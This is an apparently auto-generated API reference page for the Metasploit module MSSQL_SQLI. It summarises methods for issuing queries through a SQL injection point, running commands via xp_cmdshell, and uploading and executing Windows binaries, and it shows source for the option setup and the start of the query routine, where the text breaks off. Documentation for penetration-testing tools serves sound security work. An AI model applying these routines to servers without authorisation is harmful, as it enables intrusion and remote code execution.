<!DOCTYPE html>
<html>
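<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::MSSQL_SQLI
&mdash; Documentation by YARD 0.9.37
</title>
<!-- Stylesheets: type="text/css" and the trailing slash are redundant on <link rel="stylesheet"> and were dropped -->
<link rel="stylesheet" href="../../../css/style.css">
<link rel="stylesheet" href="../../../css/common.css">
<!-- Page-level globals (implicit, non-strict assignment); presumably read by app.js below, so they stay inline and before it -->
<script>
pathId = "Msf::Exploit::Remote::MSSQL_SQLI";
relpath = '../../../';
</script>
<!-- Scripts: type="text/javascript" and charset are redundant on external scripts; load order (jquery before app) is preserved -->
<script src="../../../js/jquery.js"></script>
<script src="../../../js/app.js"></script>
</head>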
<body>
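<div class="nav_wrap">
<!-- Class list is loaded in a same-origin frame (relative URL); the title gives the frame an accessible name -->
<iframe id="nav" src="../../../class_list.html?1" title="Class list"></iframe>
<div id="resizer"></div>
</div>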
<div id="main" tabindex="-1">
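<div id="header">
<!-- Breadcrumb trail from the index down to this module -->
<div id="menu">
<a href="../../../_index.html">Index (M)</a> &raquo;
<span class="title"><span class="object_link"><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class="title"><span class="object_link"><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class="title"><span class="object_link"><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">MSSQL_SQLI</span>
</div>
<div id="search">
<!-- Icon-only link: the SVG carries no text, so aria-label supplies the accessible name and the graphic is hidden from assistive tech -->
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html" aria-label="Class list">
<svg width="24" height="24" aria-hidden="true">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>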
<div id="content"><h1>Module: Msf::Exploit::Remote::MSSQL_SQLI
</h1>
<!-- Module metadata: the mixins it includes and the source file it is defined in -->
<div class="box_info">
  <dl>
    <dt>Includes:</dt>
    <dd><span class="object_link"><a href="HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">HttpClient</a></span></dd>
  </dl>
  <dl>
    <dt>Defined in:</dt>
    <dd>lib/msf/core/exploit/remote/mssql_sqli.rb</dd>
  </dl>
</div>
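<h2>Overview</h2><div class="docstring">
<div class="discussion">
<!-- Overview text, presumably taken from the source comment in lib/msf/core/exploit/remote/mssql_sqli.rb; punctuation fixed so the two sentences no longer run together -->
<p>This module wraps functionality for exploiting SQL injection vulnerabilities. Some of the functionality has been borrowed from mssql.rb.</p>
</div>
</div>
<div class="tags">
</div>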
<h2>Instance Attribute Summary</h2>
<!-- Attributes this module gains from the HttpClient mixin -->
<h3 class="inherited">Attributes included from <span class="object_link"><a href="HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">HttpClient</a></span></h3>
<p class="inherited">
  <span class="object_link"><a href="HttpClient.html#client-instance_method" title="Msf::Exploit::Remote::HttpClient#client (method)">#client</a></span>,
  <span class="object_link"><a href="HttpClient.html#cookie_jar-instance_method" title="Msf::Exploit::Remote::HttpClient#cookie_jar (method)">#cookie_jar</a></span>
</p>
<h2>
Instance Method Summary
<!-- The "#" href is a placeholder: collapse/expand is presumably bound to .summary_toggle by app.js (loaded in the head); without that script the link would only scroll to the top -->
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<!-- One entry per public instance method; each anchor targets the signature heading with the same id under Instance Method Details -->
<ul class="summary">
  <li class="public ">
    <span class="summary_signature">
      <a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
    </span>
    <span class="summary_desc"><div class="inline">
      <p>Creates an instance of a MSSQL exploit module.</p>
    </div></span>
  </li>
  <li class="public ">
    <span class="summary_signature">
      <a href="#mssql_query-instance_method" title="#mssql_query (instance method)">#<strong>mssql_query</strong>(sqla, doprint = false) &#x21d2; Object </a>
    </span>
    <span class="summary_desc"><div class="inline">
      <p>Issue a SQL query using the SQL injection point.</p>
    </div></span>
  </li>
  <li class="public ">
    <span class="summary_signature">
      <a href="#mssql_upload_exec-instance_method" title="#mssql_upload_exec (instance method)">#<strong>mssql_upload_exec</strong>(exe, debug = false) &#x21d2; Object </a>
    </span>
    <span class="summary_desc"><div class="inline">
      <p>Upload and execute a Windows binary through MSSQL queries.</p>
    </div></span>
  </li>
  <li class="public ">
    <span class="summary_signature">
      <a href="#mssql_xpcmdshell-instance_method" title="#mssql_xpcmdshell (instance method)">#<strong>mssql_xpcmdshell</strong>(cmd, doprint = false, opts = {}) &#x21d2; Object </a>
    </span>
    <span class="summary_desc"><div class="inline">
      <p>Execute a system command via xp_cmdshell.</p>
    </div></span>
  </li>
  <li class="public ">
    <span class="summary_signature">
      <a href="#powershell_upload_exec-instance_method" title="#powershell_upload_exec (instance method)">#<strong>powershell_upload_exec</strong>(exe, debug = false) &#x21d2; Object </a>
    </span>
    <span class="summary_desc"><div class="inline">
      <p>Upload and execute a Windows binary through MSSQL queries and Powershell.</p>
    </div></span>
  </li>
</ul>
<!-- Methods this module picks up from its mixins, grouped by the module that defines them; class methods are listed without the leading # -->
<h3 class="inherited">Methods included from <span class="object_link"><a href="HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">HttpClient</a></span></h3>
<p class="inherited">
  <span class="object_link"><a href="HttpClient.html#basic_auth-instance_method" title="Msf::Exploit::Remote::HttpClient#basic_auth (method)">#basic_auth</a></span>,
  <span class="object_link"><a href="HttpClient.html#cleanup-instance_method" title="Msf::Exploit::Remote::HttpClient#cleanup (method)">#cleanup</a></span>,
  <span class="object_link"><a href="HttpClient.html#configure_http_login_scanner-instance_method" title="Msf::Exploit::Remote::HttpClient#configure_http_login_scanner (method)">#configure_http_login_scanner</a></span>,
  <span class="object_link"><a href="HttpClient.html#connect-instance_method" title="Msf::Exploit::Remote::HttpClient#connect (method)">#connect</a></span>,
  <span class="object_link"><a href="HttpClient.html#connect_ws-instance_method" title="Msf::Exploit::Remote::HttpClient#connect_ws (method)">#connect_ws</a></span>,
  <span class="object_link"><a href="HttpClient.html#deregister_http_client_options-instance_method" title="Msf::Exploit::Remote::HttpClient#deregister_http_client_options (method)">#deregister_http_client_options</a></span>,
  <span class="object_link"><a href="HttpClient.html#disconnect-instance_method" title="Msf::Exploit::Remote::HttpClient#disconnect (method)">#disconnect</a></span>,
  <span class="object_link"><a href="HttpClient.html#download-instance_method" title="Msf::Exploit::Remote::HttpClient#download (method)">#download</a></span>,
  <span class="object_link"><a href="HttpClient.html#full_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#full_uri (method)">#full_uri</a></span>,
  <span class="object_link"><a href="HttpClient.html#handler-instance_method" title="Msf::Exploit::Remote::HttpClient#handler (method)">#handler</a></span>,
  <span class="object_link"><a href="HttpClient.html#http_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#http_fingerprint (method)">#http_fingerprint</a></span>,
  <span class="object_link"><a href="HttpClient.html#lookup_http_fingerprints-instance_method" title="Msf::Exploit::Remote::HttpClient#lookup_http_fingerprints (method)">#lookup_http_fingerprints</a></span>,
  <span class="object_link"><a href="HttpClient.html#normalize_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#normalize_uri (method)">#normalize_uri</a></span>,
  <span class="object_link"><a href="HttpClient.html#path_from_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#path_from_uri (method)">#path_from_uri</a></span>,
  <span class="object_link"><a href="HttpClient.html#peer-instance_method" title="Msf::Exploit::Remote::HttpClient#peer (method)">#peer</a></span>,
  <span class="object_link"><a href="HttpClient.html#proxies-instance_method" title="Msf::Exploit::Remote::HttpClient#proxies (method)">#proxies</a></span>,
  <span class="object_link"><a href="HttpClient.html#reconfig_redirect_opts!-instance_method" title="Msf::Exploit::Remote::HttpClient#reconfig_redirect_opts! (method)">#reconfig_redirect_opts!</a></span>,
  <span class="object_link"><a href="HttpClient.html#request_opts_from_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_opts_from_url (method)">#request_opts_from_url</a></span>,
  <span class="object_link"><a href="HttpClient.html#request_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_url (method)">#request_url</a></span>,
  <span class="object_link"><a href="HttpClient.html#rhost-instance_method" title="Msf::Exploit::Remote::HttpClient#rhost (method)">#rhost</a></span>,
  <span class="object_link"><a href="HttpClient.html#rport-instance_method" title="Msf::Exploit::Remote::HttpClient#rport (method)">#rport</a></span>,
  <span class="object_link"><a href="HttpClient.html#send_request_cgi-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi (method)">#send_request_cgi</a></span>,
  <span class="object_link"><a href="HttpClient.html#send_request_cgi!-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi! (method)">#send_request_cgi!</a></span>,
  <span class="object_link"><a href="HttpClient.html#send_request_raw-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_raw (method)">#send_request_raw</a></span>,
  <span class="object_link"><a href="HttpClient.html#service_details-instance_method" title="Msf::Exploit::Remote::HttpClient#service_details (method)">#service_details</a></span>,
  <span class="object_link"><a href="HttpClient.html#setup-instance_method" title="Msf::Exploit::Remote::HttpClient#setup (method)">#setup</a></span>,
  <span class="object_link"><a href="HttpClient.html#ssl-instance_method" title="Msf::Exploit::Remote::HttpClient#ssl (method)">#ssl</a></span>,
  <span class="object_link"><a href="HttpClient.html#ssl_version-instance_method" title="Msf::Exploit::Remote::HttpClient#ssl_version (method)">#ssl_version</a></span>,
  <span class="object_link"><a href="HttpClient.html#sslkeylogfile-instance_method" title="Msf::Exploit::Remote::HttpClient#sslkeylogfile (method)">#sslkeylogfile</a></span>,
  <span class="object_link"><a href="HttpClient.html#strip_tags-instance_method" title="Msf::Exploit::Remote::HttpClient#strip_tags (method)">#strip_tags</a></span>,
  <span class="object_link"><a href="HttpClient.html#target_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#target_uri (method)">#target_uri</a></span>,
  <span class="object_link"><a href="HttpClient.html#validate_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#validate_fingerprint (method)">#validate_fingerprint</a></span>,
  <span class="object_link"><a href="HttpClient.html#vhost-instance_method" title="Msf::Exploit::Remote::HttpClient#vhost (method)">#vhost</a></span>
</p>
<h3 class="inherited">Methods included from <span class="object_link"><a href="Kerberos/ServiceAuthenticator/Options.html" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options (module)">Kerberos::ServiceAuthenticator::Options</a></span></h3>
<p class="inherited">
  <span class="object_link"><a href="Kerberos/ServiceAuthenticator/Options.html#kerberos_auth_options-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_auth_options (method)">#kerberos_auth_options</a></span>,
  <span class="object_link"><a href="Kerberos/ServiceAuthenticator/Options.html#kerberos_clock_skew_seconds-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_clock_skew_seconds (method)">#kerberos_clock_skew_seconds</a></span>
</p>
<h3 class="inherited">Methods included from <span class="object_link"><a href="Kerberos/Ticket/Storage.html" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage (module)">Kerberos::Ticket::Storage</a></span></h3>
<p class="inherited">
  <span class="object_link"><a href="Kerberos/Ticket/Storage.html#kerberos_storage_options-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_storage_options (method)">#kerberos_storage_options</a></span>,
  <span class="object_link"><a href="Kerberos/Ticket/Storage.html#kerberos_ticket_storage-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_ticket_storage (method)">#kerberos_ticket_storage</a></span>,
  <span class="object_link"><a href="Kerberos/Ticket/Storage.html#store_ccache-class_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache (method)">store_ccache</a></span>
</p>
<h3 class="inherited">Methods included from <span class="object_link"><a href="../../Auxiliary/LoginScanner.html" title="Msf::Auxiliary::LoginScanner (module)">Auxiliary::LoginScanner</a></span></h3>
<p class="inherited">
  <span class="object_link"><a href="../../Auxiliary/LoginScanner.html#configure_login_scanner-instance_method" title="Msf::Auxiliary::LoginScanner#configure_login_scanner (method)">#configure_login_scanner</a></span>
</p>
<h3 class="inherited">Methods included from <span class="object_link"><a href="../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited">
  <span class="object_link"><a href="../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_web_form (method)">#report_web_form</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_web_page-instance_method" title="Msf::Auxiliary::Report#report_web_page (method)">#report_web_page</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_web_site-instance_method" title="Msf::Auxiliary::Report#report_web_site (method)">#report_web_site</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#report_web_vuln-instance_method" title="Msf::Auxiliary::Report#report_web_vuln (method)">#report_web_vuln</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#store_cred-instance_method" title="Msf::Auxiliary::Report#store_cred (method)">#store_cred</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#store_local-instance_method" title="Msf::Auxiliary::Report#store_local (method)">#store_local</a></span>,
  <span class="object_link"><a href="../../Auxiliary/Report.html#store_loot-instance_method" title="Msf::Auxiliary::Report#store_loot (method)">#store_loot</a></span>
</p>
<h3 class="inherited">Methods included from <span class="object_link"><a href="../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited">
  <span class="object_link"><a href="../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>,
  <span class="object_link"><a href="../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>,
  <span class="object_link"><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>,
  <span class="object_link"><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>,
  <span class="object_link"><a href="../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span>
</p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Creates an instance of a MSSQL exploit module.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 18</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span>
<span class='comment'># Register the options that all MSSQL exploits may make use of.
</span> <span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../Opt.html" title="Msf::Opt (module)">Opt</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Opt.html#RHOST-constant" title="Msf::Opt::RHOST (constant)">RHOST</a></span></span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../Opt.html" title="Msf::Opt (module)">Opt</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Opt.html#RPORT-constant" title="Msf::Opt::RPORT (constant)">RPORT</a></span></span><span class='lparen'>(</span><span class='int'>80</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>METHOD</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET or POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The complete path with [SQLi] indicating the injection</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATA</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>POST data, if necessary, with [SQLi] indicating the injection</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>COOKIE</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Cookie value</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::MSSQL_SQLI (module)">MSSQL_SQLI</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_advanced_options'>register_advanced_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptPath.html" title="Msf::OptPath (class)">OptPath</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBase.html#initialize-instance_method" title="Msf::OptBase#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HEX2BINARY</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The path to the hex2binary script on the disk</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span>
<span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_join'>join</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Config.html" title="Msf::Config (class)">Config</a></span></span><span class='period'>.</span><span class='id identifier rubyid_data_directory'><span class='object_link'><a href="../../Config.html#data_directory-class_method" title="Msf::Config.data_directory (method)">data_directory</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>exploits</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>mssql</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>h2b</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::MSSQL_SQLI (module)">MSSQL_SQLI</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_autofilter_ports'>register_autofilter_ports</span><span class='lparen'>(</span><span class='lbracket'>[</span> <span class='int'>80</span><span class='comma'>,</span> <span class='int'>443</span><span class='comma'>,</span> <span class='int'>8080</span> <span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_autofilter_services'>register_autofilter_services</span><span class='lparen'>(</span><span class='words_beg'>%W{</span><span class='words_sep'> </span><span class='tstring_content'>http</span><span class='words_sep'> </span><span class='tstring_content'>https</span><span class='words_sep'> </span><span class='tstring_end'>}</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mssql_query-instance_method">
#<strong>mssql_query</strong>(sqla, doprint = false) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Issue a SQL query using the SQL injection point</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 136</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mssql_query'>mssql_query</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='comma'>,</span> <span class='id identifier rubyid_doprint'>doprint</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_doprint'>doprint</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>METHOD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_index'>index</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html#NoTarget-constant" title="Msf::Module::Failure::NoTarget (constant)">NoTarget</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The SQL injection parameter was not specified in the GET path</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
